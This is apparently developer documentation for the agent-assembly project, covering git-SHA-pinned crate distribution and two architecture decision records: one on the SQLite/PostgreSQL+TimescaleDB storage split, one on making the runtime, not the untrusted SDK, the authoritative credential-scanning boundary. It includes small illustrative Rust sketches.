`aa-security`	advisory, non-authoritative credential preflight
`aa-sdk-client`	UDS transport, IPC codec, `AssemblyClient` lifecycle

Distribution mechanism: git SHA pin

The chosen distribution mechanism is a git SHA pin, not a registry publish. The rationale (crates.io was rejected; a bare branch name does not resolve once another crate in the graph consumes the same dependency, so a full SHA is required) is recorded in ADR 0002: SDK Security Boundary.

A consumer pins each crate to an exact commit:

[dependencies]
aa-core       = { git = "https://github.com/ai-agent-assembly/agent-assembly.git", rev = "<full-40-char-sha>", package = "aa-core", features = ["serde"] }
aa-proto      = { git = "https://github.com/ai-agent-assembly/agent-assembly.git", rev = "<full-40-char-sha>", package = "aa-proto" }
aa-security   = { git = "https://github.com/ai-agent-assembly/agent-assembly.git", rev = "<full-40-char-sha>", package = "aa-security" }
aa-sdk-client = { git = "https://github.com/ai-agent-assembly/agent-assembly.git", rev = "<full-40-char-sha>", package = "aa-sdk-client" }

Notes:

Use the full 40-character SHA, not a branch. cargo’s rev is a precise revspec; a bare branch name fails to resolve once another crate in the graph consumes the same dependency.
A git dependency checks out the whole repository, so workspace inheritance (version.workspace, [lints] workspace, dep = { workspace = true }) and the proto/ sources at the workspace root resolve transparently — the consumer does not need to reproduce any of it.
aa-sdk-client is publish = false on purpose: it is distributed only via the git pin, never to crates.io.
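A consumer repository could guard the first note with a small check before committing a pin. This is a hypothetical helper, not something the monorepo ships; it only verifies the shape of the string (40 hexadecimal characters), not that the commit exists.

```rust
/// Returns true if `rev` looks like a full git SHA-1: exactly 40 hex digits.
/// Branch names, tags, and abbreviated SHAs are rejected.
pub fn is_full_sha(rev: &str) -> bool {
    rev.len() == 40 && rev.bytes().all(|b| b.is_ascii_hexdigit())
}
```

An abbreviated pin such as `ed4aa11a` or a branch name such as `master` fails the check, which is the failure mode the note warns about.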

Regression guard

scripts/standalone-build-smoke.sh builds each of the four crates as a git-SHA-pinned consumer from a clean checkout of HEAD, outside the workspace. It runs in CI via the Crate Pinnability Smoke workflow on every pull request and master push that touches a shared crate, so a path-coupling regression — e.g. a shared crate gaining a dependency that resolves only inside the workspace checkout — fails CI here before an SDK repo hits it.

Run it locally with:

make standalone-smoke
# or
bash scripts/standalone-build-smoke.sh

Last updated: 2026-06-07 by Chisanan232

Architecture Decision Records

This directory contains Architecture Decision Records (ADRs) for agent-assembly. Each ADR documents a significant architectural choice — the context that drove the decision, the alternatives considered, and the consequences accepted.

The format follows a lightweight variant of Michael Nygard’s template. New ADRs are numbered sequentially and never rewritten; superseded decisions are recorded by adding a new ADR that links back.

Index

ADR	Title	Status
0001	Storage Architecture — SQLite (local) / PostgreSQL + TimescaleDB (production)	Accepted
0002	SDK Security Boundary, Shared-Crate Layout & Distribution	Accepted

ADR 0001: Storage Architecture — SQLite (local) / PostgreSQL + TimescaleDB (production)

Status: Accepted · Date: 2026-05 · Spec reference: lines 7107–7215

Context

agent-assembly needs to persist three categories of data, and the spec (lines 7113–7134) is explicit that they have fundamentally different access patterns and must not be forced into a single store:

Category	Nature	Query pattern
① Audit events — tool-call records, policy decisions, behaviour log	write-heavy, append-only, strong time-series, large volume	time-range scan, filter by `agent_id`, filter by `dry_run`
② Agent registry & config — online agents, identity, policy configuration	read-heavy, small volume, requires ACID	key lookup, simple joins
③ Metrics / aggregates — token usage, cost, event rate, anomaly data	time-series, requires fast rollup	time-series range query, rollup, window functions

The product ships in two deployment modes — Local Dev Mode (single machine, zero ops, fast feedback loop) and Production (multi-instance gateway behind a load balancer, durable retention, compliance evidence) — and a single backend cannot serve both well.

Without a deliberate decision recorded here, two failure modes become likely as Epic 18 lands:

Future contributors encountering sqlite.rs and postgres.rs side by side propose replacing one to “simplify”; the asymmetric requirements of the two deployment modes are not visible from the code alone.
A contributor reading “time-series workloads at thousands of events per second” reaches for Cassandra by reflex without seeing that the agent-registry ACID requirement and the operational cost rule it out at current scale.

Decision

Concern	Choice
Local Dev Mode storage	SQLite (single file at `~/.aasm/local.db`, WAL journal mode)
Production storage	PostgreSQL 15+ with the TimescaleDB 2.x extension
Policy hot-path cache	Redis 7+, optional, off by default; enable only once measurements show policy-eval latency is a bottleneck
Wide-column / NoSQL audit store	Not used (see Why not Cassandra below)
Backend abstraction	A single `StorageBackend` trait in `aa-gateway/src/storage/`; both SQLite and Postgres implement it; business logic depends only on the trait
Compression / retention for warm data	TimescaleDB native column-store compression (production); manual rolling-delete (local dev)

The StorageBackend trait surface, configuration schema, retention-policy structure, and environment-variable overrides are defined in Epic AAASM-1569.
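To make the backend-abstraction row concrete, here is a deliberately small sketch of the pattern. It is not the trait defined in Epic AAASM-1569: the method names, the synchronous signatures, the `AuditEvent` fields, and the in-memory `MemoryBackend` are all assumptions chosen for illustration.

```rust
/// Simplified audit record (hypothetical fields).
#[derive(Clone, Debug, PartialEq)]
pub struct AuditEvent {
    pub ts: u64,
    pub agent_id: String,
    pub dry_run: bool,
}

/// Hypothetical, cut-down storage trait: business logic sees only this.
pub trait StorageBackend {
    fn append_audit(&mut self, event: AuditEvent);
    /// Events for one agent with `from_ts <= ts < to_ts`.
    fn audit_range(&self, agent_id: &str, from_ts: u64, to_ts: u64) -> Vec<AuditEvent>;
}

/// In-memory stand-in for a real SQLite or PostgreSQL implementation.
#[derive(Default)]
pub struct MemoryBackend {
    events: Vec<AuditEvent>,
}

impl StorageBackend for MemoryBackend {
    fn append_audit(&mut self, event: AuditEvent) {
        self.events.push(event);
    }

    fn audit_range(&self, agent_id: &str, from_ts: u64, to_ts: u64) -> Vec<AuditEvent> {
        self.events
            .iter()
            .filter(|e| e.agent_id == agent_id && e.ts >= from_ts && e.ts < to_ts)
            .cloned()
            .collect()
    }
}

/// Example business logic: depends on the trait, never on a concrete backend.
pub fn count_dry_runs(store: &dyn StorageBackend, agent_id: &str, from_ts: u64, to_ts: u64) -> usize {
    store
        .audit_range(agent_id, from_ts, to_ts)
        .iter()
        .filter(|e| e.dry_run)
        .count()
}
```

Because `count_dry_runs` takes `&dyn StorageBackend`, the same function would work unchanged against any other implementation of the trait, which is the property the decision table relies on.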

Storage Stack

Local Dev Mode

SQLite (single file: ~/.aasm/local.db, journal_mode = wal)
  ├── Audit events      — table with (ts, agent_id) index
  ├── Agent registry    — table
  ├── Policy versions   — table (BLOB for the YAML/JSON document)
  └── Metrics           — in-memory aggregation only; not persisted
                          (dev does not need historical trends)

Rationale: zero external dependencies, single process, single user. A developer can open the file in any SQLite browser. Performance is sufficient because dev volumes do not approach the multi-writer or multi-machine ceiling.

Production (Self-hosted / SaaS)

PostgreSQL 15+
  + TimescaleDB 2.x extension     (same Postgres instance, single connection pool)
    ├── audit_events  (hypertable, chunk_interval = 7 days,
    │                  compression policy = 30 days)
    ├── metrics       (hypertable, chunk_interval = 1 day)
    ├── agent_registry  (standard table, JSONB metadata column)
    └── policy_versions (standard table, JSONB document column)

Redis 7+                          (optional; enable when measurements show the need)
  ├── Policy cache (TTL: 30s)     — hot-path policy decisions
  ├── Session state               — approval queue, pending decisions
  └── Rate-limit counters         — per-agent, per-team

Rationale: PostgreSQL alone handles the registry and policy store cleanly (ACID, JSONB for flexible schema, async-native via sqlx). TimescaleDB is a PostgreSQL extension — not a separate system — so it adds time-series partitioning and compression to the same instance with negligible operational overhead. Redis stays opt-in because policy-eval latency is acceptable straight from Postgres at current scale.
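The 30-second policy-cache TTL in the stack above means a cached decision is served for at most 30 s before the authoritative store is consulted again. The sketch below shows that expiry rule with an in-process map; it is not the Redis integration, and `TtlCache` with its `put_at` / `get_at` methods is a hypothetical type that takes the current time as a parameter so the behaviour is easy to test.

```rust
use std::collections::HashMap;
use std::time::{Duration, Instant};

/// Minimal time-to-live cache keyed by string.
pub struct TtlCache<V> {
    ttl: Duration,
    entries: HashMap<String, (Instant, V)>,
}

impl<V: Clone> TtlCache<V> {
    pub fn new(ttl: Duration) -> Self {
        TtlCache { ttl, entries: HashMap::new() }
    }

    /// Stores `value` under `key`, stamped with `now`.
    pub fn put_at(&mut self, key: &str, value: V, now: Instant) {
        self.entries.insert(key.to_string(), (now, value));
    }

    /// Returns the value only if it was stored less than `ttl` before `now`.
    pub fn get_at(&self, key: &str, now: Instant) -> Option<V> {
        self.entries.get(key).and_then(|(stored, value)| {
            if now.duration_since(*stored) < self.ttl {
                Some(value.clone())
            } else {
                None
            }
        })
    }
}
```

A miss (expired or absent) is the signal to fall back to the policy store, so a short TTL bounds how long a stale decision can be served.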

Alternatives Considered

Cassandra (rejected)

Cassandra is appropriate for workloads with extremely high sustained write volume, multi-region geo-distribution, and a tolerance for eventual consistency (the Netflix-scale event-stream archetype). It is the wrong fit here because:

ACID is required for the agent registry. Registry mutations (agent online / offline, identity rotation, enforcement-mode change) must be linearizable; an eventually-consistent registry produces visible correctness bugs — for example, an agent that is “offline” in one node’s view and “online” in another’s, racing policy evaluations against itself.
Current scale is far below Cassandra’s sweet spot. Early production deployments are in the low-thousands-of-events-per-second range; PostgreSQL + TimescaleDB handles this comfortably on commodity hardware.
Operational complexity is disproportionate. Cassandra demands cluster sizing, repair scheduling, compaction tuning, and tombstone management. For a small operating team, this overhead is not justified by any benefit at the current data volume.
Cassandra reuses none of the existing investment. Postgres expertise, the sqlx integration, and the same TimescaleDB hypertables already cover the time-series workload without introducing a second data system.

MongoDB (rejected)

Considered for the agent registry and policy store because of the JSON-document schema flexibility. Rejected because:

PostgreSQL’s JSONB column type covers the same flexible-schema use case (indexed, queryable, schema-evolution-friendly) without introducing a second data system to operate.
Strict ACID semantics for the registry are stronger in Postgres than in MongoDB’s default replication model.
Splitting “events go to one DB, registry goes to another” complicates joins (for example, listing audit events grouped by registered-agent metadata) that PostgreSQL handles trivially.

Single SQLite for production (rejected)

Considered for symmetry with Local Dev Mode. Rejected because:

SQLite has no network protocol; a multi-instance gateway cannot share a single database file safely.
SQLite’s single-writer model becomes a hard bottleneck for the audit-event write rate seen in production.
WAL mode improves concurrent reads but does not address the multi-machine or multi-writer requirement.
Backup, replication, and point-in-time recovery — table-stakes in production — are not first-class in SQLite.

PostgreSQL alone (without TimescaleDB) (rejected)

Plain PostgreSQL is viable for the registry and policy store, but for audit_events:

Time-bucketed query patterns degrade as the table grows; manual partition management is error-prone.
Compression of old data requires an external tool or a custom ETL job.
TimescaleDB provides both (hypertable partitioning + native compression) as a PostgreSQL extension, so adopting it costs only an extension install, with no separate process or operational target.

Since TimescaleDB is strictly additive (compatible with the rest of the Postgres schema and tooling), there is no reason to defer it.

Consequences

Positive

Zero external dependencies for local development. A first-time contributor can run the gateway and immediately have a working, persistent store.
Production-grade time-series performance via TimescaleDB hypertables and compression policies, without standing up a separate data system.
Business logic stays storage-agnostic. All gateway code talks to the StorageBackend trait; swapping backends is a configuration change, not a code change.
Compression and retention come for free in production via TimescaleDB compression policies; the application-level apply_retention only handles tier transitions (warm → cold archive or drop).
Compliance posture is clean (GDPR, SOC 2 Type II, ISO 27001): retention is operator-configurable and audit-event durability is guaranteed once the row commits.

Negative / Accepted trade-offs

Two backend implementations to maintain. The CI matrix must cover both SQLite and PostgreSQL. The StorageBackend trait constrains this cost: feature parity is enforced at compile time.
TimescaleDB extension is an operational requirement for production PostgreSQL deployments. Managed-PG offerings (Aiven, Timescale Cloud, RDS with the extension available) cover this; self-hosted operators must install the extension package.
Redis adds a moving part when enabled. The optional, off-by-default flag keeps it out of the dependency surface until measured latency justifies it.
Local-dev and production semantics differ slightly (for example, no compression in SQLite). The differences are documented in the gateway config reference and reflected in aasm status output.

Spec Reference

Spec lines	Topic
7107–7215	Complete storage architecture discussion (Q&A format)
7113–7134	Three data categories and their access patterns
7140–7155	Local Dev Mode storage stack (SQLite)
7157–7191	Production storage stack (PostgreSQL + TimescaleDB)
7165–7172	“Why not Cassandra” rationale
7175–7213	Recommended complete storage stack + hot / warm / cold tiering
7213	Architecture decision (one-sentence conclusion)
7215	Spec recommendation that this decision be recorded as an ADR

Epic: AAASM-1569 — Durable Persistence Layer (this ADR is its S-L deliverable)
Story: AAASM-1593 — ADR 0001 story ticket
All E18 implementation stories (StorageBackend trait, SQLite backend, PostgreSQL backend, migration runner, retention engine, etc.) implement the decision recorded here.

Last updated: 2026-05-21 by Chisanan232

ADR 0002: SDK Security Boundary, Shared-Crate Layout & Distribution

Status: Accepted · Date: 2026-06 · Epic: AAASM-2552

Amendment (AAASM-2703 / AAASM-2704, 2026-06): the original decision below kept aa-ffi-go in the monorepo as a staticlib artifact. That has been reversed for consistency: the Go shim now lives in the go-sdk repo (native/aa-ffi-go/) as a thin C-ABI layer over the git-SHA-pinned aa-sdk-client, exactly like the Node/Python shims. The monorepo no longer hosts any FFI shim (AAASM-2703 removed aa-ffi-go; AAASM-2704 vendored it into go-sdk).

Context

Two problems in the SDK / FFI layer were audited on 2026-06-05 and must be resolved together, because the fix for one constrains the other.

1. Security enforcement is in the wrong place

CredentialScanner (in aa-core/src/scanner.rs) is the credential-detection/redaction primitive. Today it runs:

Location	Trusted?	Authoritative?
`aa-gateway` (`audit.rs`, `engine/mod.rs`)	yes (server)	yes
`aa-proxy` (`intercept/`, `audit_jsonl.rs`)	yes (sidecar)	yes
`aa-ffi-python` (`src/handle.rs`)	no — in the SDK binding	it is the only scan on the SDK fast-path
`aa-runtime`	yes (trusted)	no — it does not scan or redact at all

The SDK event fast-path is SDK → UDS → aa-runtime → gRPC → gateway. aa-runtime is the mandatory chokepoint, but its pipeline is only enrich → is_policy_violation (blocked_actions) → forward/batch — it forwards the SDK’s payload without independently scanning or redacting it. Therefore a removed or bypassed SDK scanner lets raw secrets flow SDK → runtime → gateway, where the only remaining guard is the gateway’s narrower banned-key sanitizer. The SDK is being trusted as a security boundary, and it must not be.

2. The FFI bindings are duplicated and diverged

The bindings are reimplemented per language rather than sharing one implementation:

Binding	Form	Shared-crate use
`agent-assembly/aa-ffi-python`	1,357 lines (`codec/config/detect/handle/hooks/ipc/lib`), `path` deps	in-workspace
`python-sdk/rust/aa-ffi-python`	719-line `lib.rs`, imports `aa_core` + `aa_proto`	git-SHA-pinned (`rev = ed4aa11a…`)
`node-sdk/native/aa-ffi-node`	178 lines, imports no `aa_*` crate	none — reimplemented
`go-sdk/internal/ffi`	Go cgo consumer of the `aa-ffi-go` staticlib	consumes a built artifact

The Node binding diverged precisely because it shares no code with the Python one: nothing forces it to track the same logic. Go originally kept one Rust artifact in the monorepo, consumed by the Go SDK through cgo (later revised; see the amendment at the top: the Go shim now lives in go-sdk alongside the others).

Decision

Concern	Choice
Is the SDK a security boundary?	No. The SDK is untrusted.
Authoritative enforcement point	`aa-runtime` — scans, redacts, and normalizes every event before forward/audit, unconditionally.
Source of truth	gateway / control-plane (policy SoT; audit-write sanitizer kept as final backstop).
SDK-side detection	Best-effort advisory preflight only. No `clean` / `already_scanned` marker exists on the wire, and none is honored.
Security primitives home	A new `aa-security` crate (scanner, redaction, audit-normalization) — moved out of `aa-core`.
Shared runtime-client home	A new `aa-sdk-client` crate (UDS transport, proto codec, `AssemblyHandle` lifecycle, event shipping, advisory preflight).
Per-language bindings	Thin pyo3 / napi / cgo shims over `aa-sdk-client`: ergonomic API, hooks, type translation, event capture — no security authority.
Dependency direction	`aa-runtime, aa-gateway, aa-proxy, aa-sdk-client → aa-security` (security logic is not in `aa-core`).
Shared-crate distribution	git SHA pin (see below).

Trust model

UNTRUSTED                    TRUSTED ENFORCEMENT                 SOURCE OF TRUTH
Python/Node/Go SDK   ──UDS──▶ aa-runtime (mandatory chokepoint) ──gRPC──▶ gateway / control-plane
 • ergonomic API              • scan   (authoritative)                   • policy SoT
 • hooks, event capture       • redact (before forward + audit)          • audit-write sanitizer
 • type translation           • policy / approval (already server-side)    (final backstop)
 • BEST-EFFORT preflight      • normalize; re-scans EVERYTHING, always
   (advisory only)

Invariant: nothing the SDK asserts can shorten the runtime’s work. The runtime scans unconditionally. aa-security running inside the SDK is advisory, while the same crate running inside aa-runtime is authoritative. Position, not code, confers authority.
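A minimal sketch of that invariant, under stated assumptions: the `Event` shape, the `sdk_hints` map, the toy prefix detector, and the function names are all hypothetical and stand in for the real aa-security primitives. `sdk_hints` models anything a modified SDK might try to assert about itself; the Decision table states that no such marker exists on the wire, so the stage simply never reads it.

```rust
use std::collections::BTreeMap;

const REDACTED: &str = "[REDACTED]";

/// Hypothetical event shape; `sdk_hints` is whatever the SDK claims about itself.
#[derive(Debug, Clone, PartialEq)]
struct Event {
    action: String,
    payload: BTreeMap<String, String>,
    sdk_hints: BTreeMap<String, String>,
}

/// Toy detector standing in for the aa-security scanner (prefix match only).
fn looks_like_secret(value: &str) -> bool {
    value.starts_with("sk-") || value.starts_with("AKIA")
}

/// Authoritative stage: scans and redacts every payload value, every time.
/// It never reads `sdk_hints`, so no SDK assertion can skip the work.
/// Returns the redacted event and the number of values redacted.
fn runtime_scan_and_redact(mut event: Event) -> (Event, usize) {
    let mut redactions = 0;
    for value in event.payload.values_mut() {
        if looks_like_secret(value.as_str()) {
            *value = REDACTED.to_string();
            redactions += 1;
        }
    }
    (event, redactions)
}
```

An event that carries a forged `already_scanned = true` hint next to a raw key still comes out redacted, because the stage has no branch that depends on the hint.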

Crate topology

Crate	Role	Authority
`aa-security` (new)	scanner / redactor / normalization primitives	none (library)
`aa-core`	wire types, traits	none
`aa-sdk-client` (new)	UDS transport, proto codec, `AssemblyHandle`, event shipping, advisory preflight	none
`aa-runtime`	authoritative scan / redact / normalize + policy / approval	✅ the boundary
`aa-gateway`	policy SoT + audit-write sanitizer (final backstop)	✅ SoT
`aa-ffi-{python,node,go}`	thin pyo3 / napi / cgo shims	none

Canonical bindings (resolved)

Python: python-sdk/rust/aa-ffi-python (the git-pinned SDK consumer) is canonical; the monorepo agent-assembly/aa-ffi-python is the duplicate to retire. The two differ in size (719 vs 1,357 lines), so the shared logic must be reconciled into aa-sdk-client by diffing both — not by lifting either copy wholesale.
Node: node-sdk/native/aa-ffi-node is the only Node binding, but it shares no code with the core (imports no aa_* crate). It is re-pointed onto aa-sdk-client, which makes the drift structurally impossible.
Go: (revised by AAASM-2703 / AAASM-2704) aa-ffi-go is relocated into the go-sdk repo (native/aa-ffi-go/) as a thin C-ABI shim over the git-SHA-pinned aa-sdk-client, mirroring Node/Python — the monorepo no longer hosts it.

Distribution mechanism: git SHA pin

The shared crates (aa-core, aa-proto, and the new aa-security, aa-sdk-client) are consumed by the SDK repos via git dependency pinned to an exact commit SHA. This is already the established, in-production pattern — python-sdk/rust/aa-ffi-python/Cargo.toml already declares:

aa-core  = { git = "https://github.com/ai-agent-assembly/agent-assembly.git", rev = "ed4aa11a…", package = "aa-core", features = ["serde"] }
aa-proto = { git = "https://github.com/ai-agent-assembly/agent-assembly.git", rev = "ed4aa11a…", package = "aa-proto" }

The decision is to extend this same mechanism to aa-security and aa-sdk-client, not to introduce a new one.
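Because the mechanism depends on each pin being an exact commit, an SDK repo might guard its `rev` values with a small check. The function below is a hypothetical repo-side lint, not a Cargo feature, and it assumes 40-character SHA-1 commit hashes; it deliberately rejects abbreviated hashes as well as branch names.

```rust
/// Returns true only for a full 40-character hexadecimal commit SHA.
/// Branch names, tags, and abbreviated hashes are rejected by this hypothetical lint.
fn is_exact_commit_sha(rev: &str) -> bool {
    rev.len() == 40 && rev.bytes().all(|b| b.is_ascii_hexdigit())
}
```

A check like this could run over every `rev = "…"` value in an SDK repo's Cargo.toml before a pin bump is merged.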

Migration order (boundary-first, gated)

The Epic executes in this order so SDK-side scanning is never removed before the runtime is authoritative:

1. This ADR.
2. Extract aa-security (move scanner/redaction/normalization out of aa-core; temporary re-export for compat).
3. [GATE] aa-runtime authoritative scan/redact/normalize stage + guardrails.
4. SDK-bypass resistance test suite (proves the gate).
5. Make the shared crates pinnable.
6. Extract aa-sdk-client.
7. Node SDK → thin shim.
8. Python SDK → thin shim.
9. Remove fat aa-ffi-* from the workspace.

Steps 6–9 (anything that removes SDK-side scanning) are blocked on step 3.

Alternatives Considered

Trust SDK-side scanning (rejected)

Treating the SDK as the scan boundary is the current accidental state. Rejected: the SDK is attacker-controllable (a bypassed, modified, or simply outdated SDK), so any guarantee anchored there is not a guarantee. Security must hold even when the SDK does nothing.

Keep security primitives in `aa-core` (rejected)

aa-core is depended on by everything, including the thin shims and storage drivers. Hosting the scanner there enlarges the security-review blast radius to the whole base crate and forces unrelated consumers to pull it in. A small, dedicated aa-security crate gives a reviewable surface and a clean dependency direction.

Per-language reimplementation / pure-language transport (rejected)

Letting each SDK speak UDS + protobuf natively (no shared Rust) is internally coherent, but it reproduces the transport logic N times. The current divergence (Python rich, Node reinvented, no shared types) is exactly this failure mode realized halfway: the SDKs pay the native-build cost and still duplicate the logic. One shared aa-sdk-client removes the duplication while keeping the shims idiomatic.

Publish shared crates to crates.io / a private registry (rejected)

A registry would enable prebuilt-artifact reuse, but crates.io publishing was already attempted and dropped (AAASM-2338), and it adds a publish pipeline plus version-bump discipline. git-SHA pinning is already working in python-sdk, requires no new infrastructure, and pins to an exact, reproducible commit. (cargo’s rev must be a SHA, not a bare branch name, or resolution fails once a crate consumes the dependency.)

Keep the bindings in the monorepo workspace (rejected for ownership)

Keeping aa-ffi-* in the workspace preserves atomic cross-crate changes, but couples each SDK’s release to the monorepo and keeps the FFI dep trees (pyo3/napi/prost/tokio) in the core build. Moving the thin shims into their SDK repos — consuming pinned shared crates — gives the SDKs independent release cadence and shrinks the core workspace, while the shared aa-sdk-client keeps a single source of truth. Go already demonstrates the artifact-consumption variant of this model.

Consequences

Positive

The SDK can no longer weaken enforcement. Scan/redact/normalize run authoritatively at aa-runtime regardless of SDK behavior; this is proven by the bypass-resistance suite.
Drift becomes structurally impossible. One aa-sdk-client implementation, consumed by thin shims, replaces N reimplementations.
Reviewable security surface. aa-security is a small, leaf crate that the trusted enforcers depend on directly.
Smaller core build. Removing the fat bindings drops pyo3/napi/prost/tokio FFI dep trees from cargo build --workspace.
No new release infrastructure. Distribution reuses the git-SHA pin already in production.

Negative / accepted trade-offs

Authoritative scanning adds hot-path cost. Payload inspection at the runtime is more work than the current blocked_actions check; the gate Story carries explicit guardrails (precompiled scanner, secret-bearing-fields only, size caps, metrics) and must stay within the policy-latency budget.
The SDK repos rebuild the shared crates (no shared target/); org-wide build CPU time may rise unless sccache or prebuilt artifacts are added later.
Pinned SHAs require deliberate bumps. SDK repos pick up core changes only when their pin is advanced — an explicit, visible step rather than implicit coupling.
A temporary aa-core re-export of the moved primitives is needed during migration and must be removed once consumers are repointed.
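The guardrails named in the first trade-off (precompiled scanner, secret-bearing fields only, size caps, metrics) could be combined roughly as follows. This is a sketch under assumptions, not the gate Story's design: the field list, the 4096-byte cap, the prefix patterns, and all names are hypothetical, and redacting oversize values wholesale instead of forwarding them unscanned is one possible reading of "size caps".

```rust
use std::collections::BTreeMap;
use std::sync::atomic::{AtomicU64, Ordering};
use std::sync::OnceLock;

/// Hypothetical limits and field list; the ADR names the guardrails, not their values.
const MAX_SCAN_BYTES: usize = 4096;
const SECRET_BEARING_FIELDS: &[&str] = &["authorization", "api_key", "body"];

/// Metrics: values actually scanned, and values that exceeded the size cap.
static SCANNED: AtomicU64 = AtomicU64::new(0);
static OVERSIZE: AtomicU64 = AtomicU64::new(0);

/// "Precompiled" scanner: the pattern set is built once and reused for every event.
fn secret_patterns() -> &'static Vec<&'static str> {
    static PATTERNS: OnceLock<Vec<&'static str>> = OnceLock::new();
    PATTERNS.get_or_init(|| vec!["sk-", "AKIA", "ghp_"])
}

fn contains_secret(value: &str) -> bool {
    secret_patterns().iter().any(|pattern| value.contains(*pattern))
}

/// Redacts in place and returns the number of values redacted.
fn guarded_redact(payload: &mut BTreeMap<String, String>) -> usize {
    let mut redactions = 0;
    for (key, value) in payload.iter_mut() {
        // Guardrail: only secret-bearing fields are inspected.
        if !SECRET_BEARING_FIELDS.iter().any(|field| *field == key.as_str()) {
            continue;
        }
        // Guardrail: oversize values are never scanned; they are redacted wholesale.
        let oversize = value.len() > MAX_SCAN_BYTES;
        if oversize {
            OVERSIZE.fetch_add(1, Ordering::Relaxed);
        } else {
            SCANNED.fetch_add(1, Ordering::Relaxed);
        }
        if oversize || contains_secret(value.as_str()) {
            *value = "[REDACTED]".to_string();
            redactions += 1;
        }
    }
    redactions
}
```

Note the cost of the fields-only guardrail in this sketch: a secret placed in a field outside `SECRET_BEARING_FIELDS` is not inspected, so the choice of field list carries as much weight as the scanner itself.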

Epic: AAASM-2552 — SDK security boundary + FFI consolidation
Story: AAASM-2558 — this ADR
Gate: AAASM-2568 — aa-runtime authoritative enforcement (blocks Stories 6–9)
Follow-on stories: AAASM-2567 (aa-security), AAASM-2570 (aa-sdk-client), AAASM-2559 (pinnable crates), AAASM-2560 / AAASM-2561 (Node / Python shims), AAASM-2562 (remove fat bindings), AAASM-2569 (bypass tests)

Last updated: 2026-06-07 by Chisanan232